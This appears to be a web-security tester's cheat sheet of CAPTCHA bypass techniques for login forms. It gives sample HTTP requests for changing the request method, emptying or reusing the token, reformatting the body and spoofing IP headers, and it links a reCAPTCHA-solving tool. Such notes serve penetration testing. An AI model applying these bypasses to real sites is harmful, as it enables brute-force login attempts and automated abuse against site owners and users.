Bypass Captcha

Methods

CAPTCHA | Sec-88

Web_Hacking/Captcha Bypass.md at main · Mehdi0x90/Web_HackingGitHub

Captcha BypassSecurity Cipher

1 - Try changing the request method, for example

POST / HTTP 1.1 
Host: http://target.com
 ... 
 _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 

POST to GET - Change the method to GET

GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1 
Host: http://target.com
 ... 

2 - Try remove the value of the captcha parameter

POST / HTTP 1.1 
Host: http://target.com
 ... 
 _RequestVerificationToken=&_Username=daffa&_Password=test123 

3 - Try reuse old captcha token

POST / HTTP 1.1 
Host: http://target.com
 ... 
 _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 

4 - Convert JSON data to normal request parameter

POST / HTTP 1.1 
Host: http://target.com
 ... 
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}

Convert to normal request

 POST / HTTP 1.1 
 Host: http://target.com
 ... 
 _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 

5 - Try custom header to bypass captcha

X-Originating-IP: 127.0.0.1 
X-Forwarded-For: 127.0.0.1 
X-Remote-IP: 127.0.0.1 
X-Remote-Addr: 127.0.0.1

6 - Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.

POST / HTTP 1.1 
Host: http://target.com
 ... 
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

Try this to bypass

POST / HTTP 1.1 
Host: http://target.com
 ... 
 _RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123

Google Recaptcha

GitHub - sarperavci/GoogleRecaptchaBypass: Solve Google reCAPTCHA in less than 5 seconds! 🚀GitHub